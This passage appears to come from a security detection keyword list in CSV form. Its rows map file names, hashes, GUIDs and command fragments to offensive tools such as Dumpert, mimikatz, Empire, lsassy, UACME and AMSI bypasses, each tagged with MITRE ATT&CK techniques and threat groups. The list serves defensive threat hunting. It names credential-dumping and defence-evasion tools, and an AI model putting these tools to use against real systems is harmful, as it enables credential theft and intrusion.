Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" +"*dump_webpass*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" +"*dump_wifi_wpa_*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" +"*dump_WPA-PBKDF2-PMKID_EAPOL.hashcat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*dump_WPA-PMKID-PBKDF2.hashcat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*DumpBrowserHistory*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*dumpcap -*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*DumpCreds*","offensive_tool_keyword","DumpCreds","Dumpcreds is a tool that may be used to extract various credentials from running processes. I just take a look at mimipenguin(https://github.com/huntergregal/mimipenguin) and tried to improve it a bit","T1055 - T1003 - T1216 - T1002 - T1552","TA0002 - TA0003 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/ponypot/dumpcreds","1","1","N/A","N/A","1","4","1","2019-10-08T07:26:31Z","2017-10-10T12:57:42Z" +"*-DumpCreds*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*dumpCredStore.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","0","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Dumpert.bin*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*dumpert.dmp*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Dumpert.exe*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Dumpert.exe*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Dumpert.git*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*dumpert.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*dumpert_path=*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*Dumpert-Aggressor*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Dumpert-Aggressor*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*dumpertdll*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*Dumpert-DLL*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*-DumpForest *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*dumplsass*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*dumpntlm.py*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*DumpNTLMInfo.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*DumpProcessByName*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" +"*DumpShellcode.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*DumpShellcode.exe*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" +"*DumpShellcode\*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*DumpSMSAPassword*","offensive_tool_keyword","BloodHound","an adversary with local admin access to an AD-joined computer can dump the cleartext password from LSA secrets of any sMSAs installed on this computer","T1003.001 - T1078 - T1558.002","TA0006 - TA0004 - TA0003","N/A","N/A","AD Enumeration","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*dumpVaultCredentials.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*dumpXor.exe *","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" +"*-e --enumerate google*github*k8s --github-only-org --k8s-get-secret-values --gcp-get-secret-values*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","0","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" +"*-e ZQBjAGgAbwAgAEcAbwBkACAAQgBsAGUAcwBzACAAWQBvAHUAIQA=*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" +"*E09F4899-D8B3-4282-9E3A-B20EE9A3D463*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","0","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" +"*e0be14373098896893f34e02dfe84d3eb64e11d9d9f7f70a15101b41cf9ae5bd*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*E11DC25D-E96D-495D-8968-1BA09C95B673*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","0","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" +"*e1cd2b55-3b4f-41bd-a168-40db41e34349*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*e1ff2208b3786cac801ffb470b9475fbb3ced74eb503bfde7aa7f22af113989d*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*E2E64E89-8ACE-4AA1-9340-8E987F5F142F*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","0","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" +"*e333ccfe9c22eab91abd3ca224c70741e8619bb00353ea3bc4ea9d9f007cdf85*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e3f9f33e0223371b74d1ce7049a52675ea7a7086f1901b753db3cd9c187246b2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*E54195F0-060C-4B24-98F2-AD9FB5351045*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" +"*e54acaf84b54afaa2320803e0928ce9fbc19d8be3e8df4051b88f1b19cd836a5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e56e67b10a67f0d5ef4128c7ab0c6cb9ba9966916720525edfa6abf3101dfe13*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 